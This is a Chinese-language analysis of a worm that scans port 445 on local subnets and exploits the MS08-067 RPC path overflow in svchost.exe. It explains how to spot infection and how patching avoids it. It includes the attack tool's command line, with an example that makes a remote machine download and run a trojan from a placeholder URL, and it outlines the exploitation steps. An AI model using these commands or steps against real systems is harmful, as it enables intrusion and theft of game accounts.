1. 释放病毒体
病毒运行后释放以下文件:
aaa.bat,
mrosconfig.exe
vista.exe
qqq.sys
其中aaa.bat控制整个病毒的运行流程。
2. 扫描网内计算机
首先调用vista.exe对本网段(C类)范围内的所有计算机的445端口进行扫描。之后,挑选出可以连上445端口的计算机保存到一个列表文件中。
3. 攻击在线的计算机(有漏洞的会出现现象或中毒)
然后,病毒调用mrosconfig.exe对列表文件中的计算机发送RPC请求,使远程计算机中的svchost.exe中解析RPC路径时溢出,在远程计算机中下载并执行http://xxx.xxx.com/down/ko.exe。
mrosconfig.exe是一个实现下载者功能的远程溢出利用工具, 对应的命令行为:
mrosconfig.exe 要攻击的计算机的IP 要在远程下载的病毒的url
如:
mrosconfig.exe 127.0.0.1 http://xxx.xxx.com/down/ko.exe
具体的步骤如下:
(1). 使用空用户、空密码连接上远程计算机上的IPC$共享。
(2). 向连上的计算机发送远程路径".a....NN"。如果远程计算机上未修复ms08-067漏洞,那么svchost.exe调用NetpwPathCanonicalize函数解析此路径时会溢出,从而执行远程路径后的指令。
(3). 溢出指令下载附在指令后的url对应的文件到远程计算机上,并运行此文件。
(4). 下载的文件是一个木马下载者,该下载者还会下载其他的木马程序安装到被攻击的计算机上。已知会下载的木马程序包括:机器狗木马下载器,QQ三国、完美系列网游等游戏盗号器。
如果攻击失败,则远程计算机会出现’SVCHOST.exe’出错的提示。只有这个现象是用户可见的。
如果用户反映这个问题,则可以认为其所在的局域网内有机器中毒,但自身没有中。打上补丁就可以避免。
4. 自删除病毒体
删除释放的mrosconfig.exe,vista.exe,qqq.sys,aaa.bat。
版权与免责声明
1、本站所发布的文章仅供技术交流参考,本站不主张将其做为决策的依据,浏览者可自愿选择采信与否,本站不对因采信这些信息所产生的任何问题负责。
2、本站部分文章来源于网络,其版权为原权利人所有。由于来源之故,有的文章未能获得作者姓名,署“未知”或“佚名”。对于这些文章,有知悉作者姓名的请告知本站,以便及时署名。如果作者要求删除,我们将予以删除。除此之外本站不再承担其它责任。
3、本站部分文章来源于本站原创,本站拥有所有权利。
4、如对本站发布的信息有异议,请联系我们,经本站确认后,将在三个工作日内做出修改或删除处理。
请参阅权责声明!